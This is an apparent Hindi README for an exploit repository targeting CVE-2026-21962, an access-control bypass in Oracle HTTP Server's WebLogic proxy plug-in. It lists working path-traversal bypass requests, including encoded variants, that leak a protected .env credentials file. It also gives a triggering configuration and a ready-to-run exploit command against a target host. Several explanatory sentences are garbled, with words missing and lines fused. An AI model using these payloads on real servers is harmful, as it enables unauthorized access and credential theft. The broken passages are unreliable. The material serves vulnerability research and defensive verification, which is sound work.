
CVE-2026-21962 के लिए सत्यापित PoC और विश्लेषण, जो Oracle HTTP Server/WebLogic Proxy Plug-in में URI सामान्यीकरण असंगति के माध्यम से एक्सेस-कंट्रोल बायपास है, जिसमें एक्सप्लॉइट स्क्रिप्ट और साक्ष्य शामिल हैं।
CVE-2026-21962 (अनुचित एक्सेस कंट्रोल, CVSS 10.0) के लिए एक स्वतंत्र रूप से पुनरुत्पादित एक्सप्लॉइट और विश्लेषण, Oracle HTTP Server / Apache HTTP Server के लिए Oracle WebLogic Server प्रॉक्सी प्लग-इन में।
स्थिति: सत्यापित लाइव OHS 12.2.1.4.0 और 14.1.2.0.0 के विरुद्ध, जो WebLogic Server 12.2.1.4 के सामने है।
फ्रंट-एंड (OHS + mod_wl_ohs) और बैकएंड (WebLogic) ..; को अलग-अलग तरीके से नॉर्मलाइज़ करते हैं। एक अनुरोध जैसे:
GET /foo/..;/internal-admin/cont/.env HTTP/1.1
फ्रंट-एंड <Location /internal-admin> सुरक्षा नियम को बाईपास करता है क्योंकि OHS ..; को , जबकि WebLogic ( = सर्वलेट पाथ-पैरामीटर, = पैरेंट)। फिर बैकएंड संरक्षित पथ को सर्व करता है। परिणाम: (CWE-284)।
;..देखें analysis/root-cause.md।
mod_wl_ohs (WLSPLUGINS_12.2.1.4.0_LINUX.X64_190912.1848) जो WebLogic Server 12.2.1.4 के सामने है।mod_wl_ohs (WLSPLUGINS_14.1.2.0.0_LINUX.X64_250908.1137) जो WebLogic Server 12.2.1.4 के सामने है।.env लीक करते हैं):
/foo/..;/internal-admin/cont/.env/foo/..%3b/internal-admin/cont/.env/foo/..;jsessionid=xxxx/internal-admin/cont/.env/foo/%2e%2e;/internal-admin/cont/.env404), जो बाईपास को साबित करता है।X-ORACLE-DMS-* हेडर होते हैं, जो साबित करते हैं कि यह एक वास्तविक बैकएंड (WebLogic) प्रतिक्रिया है।/internal-admin/... पर नॉर्मलाइज़ किया गया था (GET /foo/../internal-admin/... 200)।evidence/)।poc-factcheck.md)।isapi_wl, 12.2.1.4.0 में प्रभावित)। समान तंत्र की उम्मीद है (बैकएंड पर सर्वलेट पाथ रिज़ॉल्यूशन), लेकिन इसे Windows पर पुनरुत्पादित नहीं किया गया।analysis/patch-analysis.md)।| भूमिका | घटक | संस्करण |
|---|---|---|
| फ्रंट-एंड | Oracle HTTP Server | 12.2.1.4.0 / 14.1.2.0.0 |
| प्लग-इन | mod_wl_ohs | 12.2.1.4 (190912) / 14.1.2 (250908) |
| बैकएंड | Oracle WebLogic Server | 12.2.1.4 |
| संरक्षित ऐप | /internal-admin/cont/.env (निर्मित क्रेडेंशियल) | — |
उपयोग की गई फ्रंट-एंड कॉन्फ़िगरेशन (न्यूनतम ट्रिगर):
<Location /foo>
WLSRequest ON
WebLogicCluster <backend>:7101
</Location>
<Location /internal-admin>
ErrorDocument 404 'OHS: Disallowed location'
Redirect 404 /
</Location>
समान अनुरोध, समान फ्रंट-एंड, समान बैकएंड — केवल फ्रंट-एंड का ..; का हैंडलिंग बदला गया है।
GET /foo/..;/internal-admin/cont/.env HTTP/1.1
| डिप्लॉयमेंट | HTTP | लीक | बैकएंड तक पहुंच |
|---|---|---|---|
| कमजोर | 200 | हाँ (.env क्रेडेंशियल) | हाँ (X-ORACLE-DMS-*) |
| पैच किया हुआ (ठीक किया गया नॉर्मलाइज़ेशन) | 404 | नहीं | नहीं |
कच्चा सबूत (अनुरोध / प्रतिक्रिया / सर्वर लॉग):
python3 exploit/CVE-2026-21962.py -t http://TARGET:PORT --auto-proxy --check ALL
--auto-proxy : WLSRequest प्रॉक्सी उपसर्ग (जैसे /foo) का स्वतः पता लगाएं।-c : बैकएंड पर संरक्षित पथ (डिफ़ॉल्ट internal-admin/cont/.env)।--check LEAK|SSRF|ALL।X-ORACLE-DMS-* हेडर का उपयोग करता है; नियंत्रण (सीधा) अनुरोध को सकारात्मक निर्णय के लिए ब्लॉक किया जाना चाहिए।विवरण के लिए exploit/README.md देखें। केवल उन सिस्टमों के विरुद्ध उपयोग करें जिन्हें आप परीक्षण करने के लिए अधिकृत हैं।
.
├── README.md यह फ़ाइल
├── exploit/
│ ├── CVE-2026-21962.py सत्यापित PoC (निर्धारक लीक जांच)
│ └── README.md
├── evidence/
│ ├── vulnerable/ request.txt, response.txt, server-log.txt
│ └── patched/ request.txt, response.txt, server-log.txt
├── analysis/
│ ├── root-cause.md नॉर्मलाइज़ेशन असंगतता विश्लेषण
│ └── patch-analysis.md बाइनरी डिफ + पैच-समतुल्य A/B
└── poc-factcheck.md सार्वजनिक-PoC विश्वसनीयता तालिका + प्रति-PoC विवरण
सक्रिय डिटेक्शन / मैपिंग टूलिंग (फिंगरप्रिंट, ब्लाइंड प्रोब, नॉर्मलाइज़-मैप) जो संरक्षित पथ जाने बिना काम करती है, अलग से ../../probe/ में रखी गई है।
exploit/CVE-2026-21962.py
SHA-256: 20f050abf2a8f0e5b644667c1f7f87bcd9b2448d03b8d5d89bd6ea71b6b4f75aयह सामग्री भेद्यता अनुसंधान और रक्षात्मक सत्यापन के लिए प्रदान की गई है। बिना प्राधिकरण के सिस्टमों के विरुद्ध उपयोग न करें। सबूत में .env सामग्री निर्मित है; कोई वास्तविक क्रेडेंशियल शामिल नहीं हैं।